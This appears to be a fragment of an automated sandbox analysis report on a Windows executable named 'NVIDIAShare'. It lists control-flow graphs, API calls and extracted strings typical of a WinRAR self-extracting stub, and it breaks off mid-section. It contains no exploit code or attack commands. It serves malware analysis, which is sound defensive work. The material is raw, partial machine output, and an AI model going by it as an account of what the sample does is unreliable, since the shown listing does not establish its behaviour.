                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
                                                              • Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0101BA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0101BA90
                                                            • GetTickCount.KERNEL32 ref: 0101BAAE
                                                            • _swprintf.LIBCMT ref: 0101BAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 0101BAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0101BB43
                                                            • _swprintf.LIBCMT ref: 0101BB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0101BBD0
                                                            • GetCommandLineW.KERNEL32 ref: 0101BBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0101BC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0101BC6F
                                                            • Sleep.KERNEL32(00000064), ref: 0101BCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0101BCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0101BCEB
                                                            • _swprintf.LIBCMT ref: 0101BD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,010335F4), ref: 0101BD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 0101BD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0101BDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0101BDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BE68
                                                            • _wcslen.LIBCMT ref: 0101BEBE
                                                            • _swprintf.LIBCMT ref: 0101BEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0101BF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0101BF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 0101BF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0101BF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 0101BF85
                                                            • SetWindowTextW.USER32(00000000,0104A472), ref: 0101BFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0101C007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0101C0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0101C197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0101C1D9
                                                              • Part of subcall function 0101C73F: __EH_prolog.LIBCMT ref: 0101C744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-311033401
                                                            • Opcode ID: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
                                                            • Instruction ID: 3ca8557b03994eac0f4a78719fc2f2576b3f7e2568d545669a07dc4b5598366f
                                                            • Opcode Fuzzy Hash: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
                                                            • Instruction Fuzzy Hash: F242FC70944245BBFB329BA4DD49FBE7BBCAB41700F004099F6C5AA0C9CB7E9944CB61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 1010863-1010886 call 101ec50 GetModuleHandleW 271 10108e7-1010b48 268->271 272 1010888-101089f GetProcAddress 268->272 273 1010c14-1010c40 GetModuleFileNameW call 100c29a call 1010602 271->273 274 1010b4e-1010b59 call 10275fb 271->274 275 10108a1-10108b7 272->275 276 10108b9-10108c9 GetProcAddress 272->276 291 1010c42-1010c4e call 100b146 273->291 274->273 286 1010b5f-1010b8d GetModuleFileNameW CreateFileW 274->286 275->276 277 10108e5 276->277 278 10108cb-10108e0 276->278 277->271 278->277 288 1010c08-1010c0f CloseHandle 286->288 289 1010b8f-1010b9b SetFilePointer 286->289 288->273 289->288 292 1010b9d-1010bb9 ReadFile 289->292 298 1010c50-1010c5b call 101081b 291->298 299 1010c7d-1010ca4 call 100c310 GetFileAttributesW 291->299 292->288 294 1010bbb-1010be0 292->294 295 1010bfd-1010c06 call 1010371 294->295 295->288 305 1010be2-1010bfc call 101081b 295->305 298->299 307 1010c5d-1010c7b CompareStringW 298->307 308 1010ca6-1010caa 299->308 309 1010cae 299->309 305->295 307->299 307->308 308->291 311 1010cac 308->311 312 1010cb0-1010cb5 309->312 311->312 313 1010cb7 312->313 314 1010cec-1010cee 312->314 317 1010cb9-1010ce0 call 100c310 GetFileAttributesW 313->317 315 1010cf4-1010d0b call 100c2e4 call 100b146 314->315 316 1010dfb-1010e05 314->316 327 1010d73-1010da6 call 1004092 AllocConsole 315->327 328 1010d0d-1010d6e call 101081b * 2 call 100e617 call 1004092 call 100e617 call 101a7e4 315->328 323 1010ce2-1010ce6 317->323 324 1010cea 317->324 323->317 326 1010ce8 323->326 324->314 326->314 333 1010df3-1010df5 ExitProcess 327->333 334 1010da8-1010ded GetCurrentProcessId AttachConsole call 1023e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01010B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01010B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,01033C7C,00000000), ref: 01010BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 01010C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01033C7C,?,00000000,?,00000800), ref: 01010C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,01033C7C,00000800,?,00000000,?,00000800), ref: 01010C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,01033D44,00000800), ref: 01010CD8
                                                              • Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                              • Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                            • _swprintf.LIBCMT ref: 01010D4A
                                                            • _swprintf.LIBCMT ref: 01010D96
                                                              • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                            • AllocConsole.KERNEL32 ref: 01010D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 01010DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 01010DAF
                                                            • _wcslen.LIBCMT ref: 01010DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 01010DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 01010DDC
                                                            • Sleep.KERNEL32(00002710), ref: 01010DE7
                                                            • FreeConsole.KERNEL32 ref: 01010DED
                                                            • ExitProcess.KERNEL32 ref: 01010DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
                                                            • Instruction ID: a00075720e099a0a5763cc4b07fda85e429c3e1a2598b1ee9b278207c0abeed2
                                                            • Opcode Fuzzy Hash: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
                                                            • Instruction Fuzzy Hash: 1ED16EB1108385AFD235AF55D888BDFBAECBBC5704F40491DF6C99E144CB398589CBA2

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 347 101c73f-101c757 call 101eb78 call 101ec50 352 101d40d-101d418 347->352 353 101c75d-101c787 call 101b314 347->353 353->352 356 101c78d-101c792 353->356 357 101c793-101c7a1 356->357 358 101c7a2-101c7b7 call 101af98 357->358 361 101c7b9 358->361 362 101c7bb-101c7d0 call 1011fbb 361->362 365 101c7d2-101c7d6 362->365 366 101c7dd-101c7e0 362->366 365->362 367 101c7d8 365->367 368 101c7e6 366->368 369 101d3d9-101d404 call 101b314 366->369 367->369 371 101c7ed-101c7f0 368->371 372 101ca7c-101ca7e 368->372 373 101ca5f-101ca61 368->373 374 101c9be-101c9c0 368->374 369->357 381 101d40a-101d40c 369->381 371->369 379 101c7f6-101c850 call 101a64d call 100bdf3 call 100a544 call 100a67e call 1006edb 371->379 372->369 377 101ca84-101ca8b 372->377 373->369 375 101ca67-101ca77 SetWindowTextW 373->375 374->369 378 101c9c6-101c9d2 374->378 375->369 377->369 382 101ca91-101caaa 377->382 383 101c9d4-101c9e5 call 1027686 378->383 384 101c9e6-101c9eb 378->384 436 101c98f-101c9a4 call 100a5d1 379->436 381->352 389 101cab2-101cac0 call 1023e13 382->389 390 101caac 382->390 383->384 387 101c9f5-101ca00 call 101b48e 384->387 388 101c9ed-101c9f3 384->388 394 101ca05-101ca07 387->394 388->394 389->369 401 101cac6-101cacf 389->401 390->389 399 101ca12-101ca32 call 1023e13 call 1023e3e 394->399 400 101ca09-101ca10 call 1023e13 394->400 421 101ca34-101ca3b 399->421 422 101ca4b-101ca4d 399->422 400->399 405 101cad1-101cad5 401->405 406 101caf8-101cafb 401->406 410 101cb01-101cb04 405->410 411 101cad7-101cadf 405->411 406->410 413 101cbe0-101cbee call 1010602 406->413 418 101cb11-101cb2c 410->418 419 101cb06-101cb0b 410->419 411->369 416 101cae5-101caf3 call 1010602 411->416 429 101cbf0-101cc04 call 102279b 413->429 416->429 437 101cb76-101cb7d 418->437 438 101cb2e-101cb68 418->438 419->413 419->418 426 101ca42-101ca4a call 1027686 421->426 427 101ca3d-101ca3f 421->427 422->369 428 101ca53-101ca5a call 1023e2e 422->428 426->422 427->426 428->369 447 101cc11-101cc62 call 1010602 call 101b1be GetDlgItem SetWindowTextW SendMessageW call 1023e49 429->447 448 101cc06-101cc0a 429->448 453 101c855-101c869 SetFileAttributesW 436->453 454 101c9aa-101c9b9 call 100a55a 436->454 440 101cbab-101cbce call 1023e13 * 2 437->440 441 101cb7f-101cb97 call 1023e13 437->441 464 101cb6a 438->464 465 101cb6c-101cb6e 438->465 440->429 473 101cbd0-101cbde call 10105da 440->473 441->440 458 101cb99-101cba6 call 10105da 441->458 480 101cc67-101cc6b 447->480 448->447 452 101cc0c-101cc0e 448->452 452->447 459 101c90f-101c91f GetFileAttributesW 453->459 460 101c86f-101c8a2 call 100b991 call 100b690 call 1023e13 453->460 454->369 458->440 459->436 470 101c921-101c930 DeleteFileW 459->470 490 101c8b5-101c8c3 call 100bdb4 460->490 491 101c8a4-101c8b3 call 1023e13 460->491 464->465 465->437 470->436 472 101c932-101c935 470->472 477 101c939-101c965 call 1004092 GetFileAttributesW 472->477 473->429 488 101c937-101c938 477->488 489 101c967-101c97d MoveFileW 477->489 480->369 485 101cc71-101cc85 SendMessageW 480->485 485->369 488->477 489->436 492 101c97f-101c989 MoveFileExW 489->492 490->454 497 101c8c9-101c908 call 1023e13 call 101fff0 490->497 491->490 491->497 492->436 497->459
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0101C744
                                                              • Part of subcall function 0101B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0101B3FB
                                                            • _wcslen.LIBCMT ref: 0101CA0A
                                                            • _wcslen.LIBCMT ref: 0101CA13
                                                            • SetWindowTextW.USER32(?,?), ref: 0101CA71
                                                            • _wcslen.LIBCMT ref: 0101CAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 0101CBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 0101CC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0101CC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0104A472), ref: 0101CC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101CC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
                                                            • Instruction ID: e6db691cefd8ca8a875add66c14126a9a7072d941056ed0adb8c4b6cead1a4d9
                                                            • Opcode Fuzzy Hash: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
                                                            • Instruction Fuzzy Hash: 3BE15672940219AAEF25DBA4DD84DEF77BDAB04310F4484A5F689E7044EF78DA848F60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0100DA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0100DAAC
                                                              • Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2
                                                              • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                              • Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,0001044E), ref: 01011BA0
                                                            • _wcslen.LIBCMT ref: 0100DDE9
                                                            • __fprintf_l.LIBCMT ref: 0100DF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
                                                            • Instruction ID: 10198a46e4c69a33095d90e25fc94161ad86905a06cce3ab82b0c1cdb0c49dbe
                                                            • Opcode Fuzzy Hash: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
                                                            • Instruction Fuzzy Hash: 6332F571900219DBEF66EFA8C840BEE77A5FF58300F40459AFA85AB2C1E771D985CB50

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                              • Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                              • Part of subcall function 0101B568: IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
                                                              • Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
                                                              • Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6
                                                            • GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
                                                            • Instruction ID: c9aa6529565a70fbb63a8f8a88daa3aff777f91894fdf6d2c519e8e4b290dabb
                                                            • Opcode Fuzzy Hash: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
                                                            • Instruction Fuzzy Hash: 2E31C171545341ABE321DF249C5AFAB7FACFB82704F00090DFAD59A194DB6A890887B6

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 836 101d78f-101d7a7 call 101ec50 839 101d9e8-101d9f0 836->839 840 101d7ad-101d7b9 call 1023e13 836->840 840->839 843 101d7bf-101d7e7 call 101fff0 840->843 846 101d7f1-101d7ff 843->846 847 101d7e9 843->847 848 101d801-101d804 846->848 849 101d812-101d818 846->849 847->846 850 101d808-101d80e 848->850 851 101d85b-101d85e 849->851 852 101d810 850->852 853 101d837-101d844 850->853 851->850 854 101d860-101d866 851->854 855 101d822-101d82c 852->855 856 101d9c0-101d9c2 853->856 857 101d84a-101d84e 853->857 858 101d868-101d86b 854->858 859 101d86d-101d86f 854->859 860 101d81a-101d820 855->860 861 101d82e 855->861 862 101d9c6 856->862 857->862 863 101d854-101d859 857->863 858->859 864 101d882-101d898 call 100b92d 858->864 859->864 865 101d871-101d878 859->865 860->855 868 101d830-101d833 860->868 861->853 870 101d9cf 862->870 863->851 871 101d8b1-101d8bc call 100a231 864->871 872 101d89a-101d8a7 call 1011fbb 864->872 865->864 866 101d87a 865->866 866->864 868->853 873 101d9d6-101d9d8 870->873 882 101d8d9-101d8e6 ShellExecuteExW 871->882 883 101d8be-101d8d5 call 100b6c4 871->883 872->871 881 101d8a9 872->881 876 101d9e7 873->876 877 101d9da-101d9dc 873->877 876->839 877->876 880 101d9de-101d9e1 ShowWindow 877->880 880->876 881->871 882->876 885 101d8ec-101d8f9 882->885 883->882 886 101d8fb-101d902 885->886 887 101d90c-101d90e 885->887 886->887 889 101d904-101d90a 886->889 890 101d910-101d919 887->890 891 101d925-101d944 call 101dc3b 887->891 889->887 892 101d97b-101d987 CloseHandle 889->892 890->891 899 101d91b-101d923 ShowWindow 890->899 891->892 905 101d946-101d94e 891->905 893 101d989-101d996 call 1011fbb 892->893 894 101d998-101d9a6 892->894 893->870 893->894 894->873 898 101d9a8-101d9aa 894->898 898->873 902 101d9ac-101d9b2 898->902 899->891 902->873 904 101d9b4-101d9be 902->904 904->873 905->892 906 101d950-101d961 GetExitCodeProcess 905->906 906->892 907 101d963-101d96d 906->907 908 101d974 907->908 909 101d96f 907->909 908->892 909->908
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0101D7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 0101D8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 0101D91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0101D959
                                                            • CloseHandle.KERNEL32(?), ref: 0101D97F
                                                            • ShowWindow.USER32(?,00000001), ref: 0101D9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
                                                            • Instruction ID: c4ee4b496d4d3682530d07e2f1b62b099e617e5530fc4bf4c4aa353c1e57ac78
                                                            • Opcode Fuzzy Hash: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
                                                            • Instruction Fuzzy Hash: 5F510770404380AAFB719FA8D448BAB7FE6AF81744F04049EFAC89B199D77DC544CB52

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 910 102a95b-102a974 911 102a976-102a986 call 102ef4c 910->911 912 102a98a-102a98f 910->912 911->912 919 102a988 911->919 913 102a991-102a999 912->913 914 102a99c-102a9c0 MultiByteToWideChar 912->914 913->914 916 102ab53-102ab66 call 101fbbc 914->916 917 102a9c6-102a9d2 914->917 920 102aa26 917->920 921 102a9d4-102a9e5 917->921 919->912 923 102aa28-102aa2a 920->923 924 102a9e7-102a9f6 call 1032010 921->924 925 102aa04-102aa15 call 1028e06 921->925 927 102aa30-102aa43 MultiByteToWideChar 923->927 928 102ab48 923->928 924->928 937 102a9fc-102aa02 924->937 925->928 938 102aa1b 925->938 927->928 931 102aa49-102aa5b call 102af6c 927->931 932 102ab4a-102ab51 call 102abc3 928->932 939 102aa60-102aa64 931->939 932->916 941 102aa21-102aa24 937->941 938->941 939->928 942 102aa6a-102aa71 939->942 941->923 943 102aa73-102aa78 942->943 944 102aaab-102aab7 942->944 943->932 945 102aa7e-102aa80 943->945 946 102ab03 944->946 947 102aab9-102aaca 944->947 945->928 948 102aa86-102aaa0 call 102af6c 945->948 949 102ab05-102ab07 946->949 950 102aae5-102aaf6 call 1028e06 947->950 951 102aacc-102aadb call 1032010 947->951 948->932 965 102aaa6 948->965 954 102ab41-102ab47 call 102abc3 949->954 955 102ab09-102ab22 call 102af6c 949->955 950->954 964 102aaf8 950->964 951->954 963 102aadd-102aae3 951->963 954->928 955->954 968 102ab24-102ab2b 955->968 967 102aafe-102ab01 963->967 964->967 965->928 967->949 969 102ab67-102ab6d 968->969 970 102ab2d-102ab2e 968->970 971 102ab2f-102ab3f WideCharToMultiByte 969->971 970->971 971->954 972 102ab6f-102ab76 call 102abc3 971->972 972->932
                                                            APIs
